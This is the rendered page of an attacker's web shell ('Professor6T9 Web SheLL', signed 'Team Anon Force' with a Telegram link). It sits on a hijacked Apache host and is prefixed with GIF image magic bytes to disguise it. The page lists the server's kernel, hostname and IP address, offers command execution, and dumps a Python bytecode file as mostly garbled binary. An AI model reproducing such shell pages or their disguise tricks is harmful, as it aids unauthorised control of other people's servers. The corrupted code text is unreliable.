GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python312
/
lib
/
python3.12
/
site-packages
/
setuptools
/
command
/
__pycache__
[ HOME ]
Exec
Submit
sdist.cpython-312.pyc
� ��_i� � � � d dl mZ d dlmc mZ d dlZd dlZd dlZd dl m Z ddlmZ ddl mZ eZdd�Z G d � d ej � Zy)� )�logN)�chain� )�metadata� )�_ORIGINAL_SUBCOMMANDSc # � K � t j d�� D ]! } |j � | � D ] }|�� � �# y�w)z%Find all files under revision controlzsetuptools.file_finders)�groupN)r �entry_points�load)�dirname�ep�items ��/builddir/build/BUILDROOT/alt-python312-setuptools-69.0.2-3.el8.x86_64/opt/alt/python312/lib/python3.12/site-packages/setuptools/command/sdist.py�walk_revctrlr s9 � �� ��#�#�*C�D���B�G�G�I�g�&�D��J� '� E�s �<>c �� � � e Zd ZdZg d�Zi Zg d�Z ed� eD � � Zd� Z d� Z d� Zd� Ze ej d � � � Z� fd �Z� fd�Zd� Zd � Zd� Zd� Z� fd�Zd� Zd� Zd� Zd� Z� xZS )�sdistz=Smart sdist that finds anything supported by revision control))zformats=Nz6formats for source distribution (comma-separated list))z keep-temp�kz@keep the distribution tree around after creating archive file(s))z dist-dir=�dzFdirectory to put the source distribution archive(s) in [default: dist])zowner=�uz@Owner name used when creating a tar file [default: current user])zgroup=�gzAGroup name used when creating a tar file [default: current group])� z.rstz.txtz.mdc # �>